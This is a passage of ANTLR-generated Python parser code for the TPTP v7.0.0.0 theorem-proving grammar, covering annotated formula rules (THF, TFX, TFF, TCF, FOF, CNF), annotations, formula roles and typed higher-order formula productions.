self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 439
self.formula_role()
self.state = 440
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 441
self.thf_formula()
self.state = 443
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 442
self.annotations()
self.state = 445
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tfx_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_annotated" ):
listener.enterTfx_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_annotated" ):
listener.exitTfx_annotated(self)
def tfx_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tfx_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_tfx_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 447
self.match(tptp_v7_0_0_0Parser.T__4)
self.state = 448
self.name()
self.state = 449
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 450
self.formula_role()
self.state = 451
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 452
self.tfx_formula()
self.state = 454
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 453
self.annotations()
self.state = 456
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tff_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_annotated" ):
listener.enterTff_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_annotated" ):
listener.exitTff_annotated(self)
def tff_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tff_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_tff_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 458
self.match(tptp_v7_0_0_0Parser.T__5)
self.state = 459
self.name()
self.state = 460
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 461
self.formula_role()
self.state = 462
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 463
self.tff_formula()
self.state = 465
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 464
self.annotations()
self.state = 467
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tcf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tcf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tcf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTcf_annotated" ):
listener.enterTcf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTcf_annotated" ):
listener.exitTcf_annotated(self)
def tcf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tcf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_tcf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 469
self.match(tptp_v7_0_0_0Parser.T__6)
self.state = 470
self.name()
self.state = 471
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 472
self.formula_role()
self.state = 473
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 474
self.tcf_formula()
self.state = 476
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 475
self.annotations()
self.state = 478
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_annotated" ):
listener.enterFof_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_annotated" ):
listener.exitFof_annotated(self)
def fof_annotated(self):
localctx = tptp_v7_0_0_0Parser.Fof_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_fof_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 480
self.match(tptp_v7_0_0_0Parser.T__7)
self.state = 481
self.name()
self.state = 482
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 483
self.formula_role()
self.state = 484
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 485
self.fof_formula()
self.state = 487
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 486
self.annotations()
self.state = 489
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def cnf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_annotated" ):
listener.enterCnf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_annotated" ):
listener.exitCnf_annotated(self)
def cnf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Cnf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_cnf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 491
self.match(tptp_v7_0_0_0Parser.T__8)
self.state = 492
self.name()
self.state = 493
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 494
self.formula_role()
self.state = 495
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 496
self.cnf_formula()
self.state = 498
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 497
self.annotations()
self.state = 500
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
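# annotations: a T__1 separator, a source, and an optional trailing optional_info,
# taken only when the lookahead check below sees another T__1.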
class AnnotationsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def source(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.SourceContext,0)
def optional_info(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Optional_infoContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_annotations
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnnotations" ):
listener.enterAnnotations(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnnotations" ):
listener.exitAnnotations(self)
def annotations(self):
localctx = tptp_v7_0_0_0Parser.AnnotationsContext(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_annotations)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 502
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 503
self.source()
self.state = 505
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 504
self.optional_info()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
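# formula_role matches a single Lower_word token; in TPTP these are role names
# such as axiom, hypothesis, or conjecture.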
class Formula_roleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def Lower_word(self):
return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_role
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_role" ):
listener.enterFormula_role(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_role" ):
listener.exitFormula_role(self)
def formula_role(self):
localctx = tptp_v7_0_0_0Parser.Formula_roleContext(self, self._ctx, self.state)
self.enterRule(localctx, 24, self.RULE_formula_role)
try:
self.enterOuterAlt(localctx, 1)
self.state = 507
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
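# The context classes and rule methods from here on implement the THF
# (typed higher-order form) productions; each rule method mirrors one grammar rule,
# choosing between alternatives via adaptivePredict or explicit lookahead token sets.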
class Thf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_formula" ):
listener.enterThf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_formula" ):
listener.exitThf_formula(self)
def thf_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_thf_formula)
try:
self.state = 511
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,11,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 509
self.thf_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 510
self.thf_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_formulaContext,0)
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def thf_type_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_type_formulaContext,0)
def thf_subtype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_subtypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_logic_formula" ):
listener.enterThf_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_logic_formula" ):
listener.exitThf_logic_formula(self)
def thf_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_thf_logic_formula)
try:
self.state = 517
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 513
self.thf_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 514
self.thf_unitary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 515
self.thf_type_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 516
self.thf_subtype()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_binary_pair(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_pairContext,0)
def thf_binary_tuple(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_tupleContext,0)
def thf_binary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_formula" ):
listener.enterThf_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_formula" ):
listener.exitThf_binary_formula(self)
def thf_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_thf_binary_formula)
try:
self.state = 522
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,13,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 519
self.thf_binary_pair()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 520
self.thf_binary_tuple()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 521
self.thf_binary_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_pairContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def thf_pair_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_pair_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_pair
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_pair" ):
listener.enterThf_binary_pair(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_pair" ):
listener.exitThf_binary_pair(self)
def thf_binary_pair(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_pairContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_thf_binary_pair)
try:
self.enterOuterAlt(localctx, 1)
self.state = 524
self.thf_unitary_formula()
self.state = 525
self.thf_pair_connective()
self.state = 526
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_or_formulaContext,0)
def thf_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_and_formulaContext,0)
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_tuple" ):
listener.enterThf_binary_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_tuple" ):
listener.exitThf_binary_tuple(self)
def thf_binary_tuple(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_thf_binary_tuple)
try:
self.state = 531
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 528
self.thf_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 529
self.thf_and_formula(0)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 530
self.thf_apply_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
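# thf_or_formula, thf_and_formula and thf_apply_formula are left-recursive in the grammar,
# so ANTLR generates them with enterRecursionRule/pushNewRecursionContext plus a precpred
# guard: the initial "unitary OP unitary" pair is parsed first, and further "OP unitary"
# tails are folded in while the predicted alternative allows it.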
class Thf_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def thf_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_or_formula" ):
listener.enterThf_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_or_formula" ):
listener.exitThf_or_formula(self)
def thf_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 36
self.enterRecursionRule(localctx, 36, self.RULE_thf_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 534
self.thf_unitary_formula()
self.state = 535
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 536
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 543
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_or_formula)
self.state = 538
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 539
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 540
self.thf_unitary_formula()
self.state = 545
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def thf_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_and_formula" ):
listener.enterThf_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_and_formula" ):
listener.exitThf_and_formula(self)
def thf_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 38
self.enterRecursionRule(localctx, 38, self.RULE_thf_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 547
self.thf_unitary_formula()
self.state = 548
self.match(tptp_v7_0_0_0Parser.And)
self.state = 549
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 556
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,16,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_and_formula)
self.state = 551
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 552
self.match(tptp_v7_0_0_0Parser.And)
self.state = 553
self.thf_unitary_formula()
self.state = 558
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,16,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_apply_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def App(self):
return self.getToken(tptp_v7_0_0_0Parser.App, 0)
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_apply_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_apply_formula" ):
listener.enterThf_apply_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_apply_formula" ):
listener.exitThf_apply_formula(self)
def thf_apply_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_apply_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 40
self.enterRecursionRule(localctx, 40, self.RULE_thf_apply_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 560
self.thf_unitary_formula()
self.state = 561
self.match(tptp_v7_0_0_0Parser.App)
self.state = 562
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 569
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_apply_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_apply_formula)
self.state = 564
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 565
self.match(tptp_v7_0_0_0Parser.App)
self.state = 566
self.thf_unitary_formula()
self.state = 571
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantified_formulaContext,0)
def thf_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_formulaContext,0)
def thf_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,0)
def thf_conditional(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_conditionalContext,0)
def thf_let(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_letContext,0)
def thf_tuple(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_tupleContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unitary_formula" ):
listener.enterThf_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unitary_formula" ):
listener.exitThf_unitary_formula(self)
def thf_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_thf_unitary_formula)
try:
self.state = 582
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 572
self.thf_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 573
self.thf_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 574
self.thf_atom()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 575
self.thf_conditional()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 576
self.thf_let()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 577
self.thf_tuple()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 578
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 579
self.thf_logic_formula()
self.state = 580
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantification(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantificationContext,0)
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantified_formula" ):
listener.enterThf_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantified_formula" ):
listener.exitThf_quantified_formula(self)
def thf_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_thf_quantified_formula)
try:
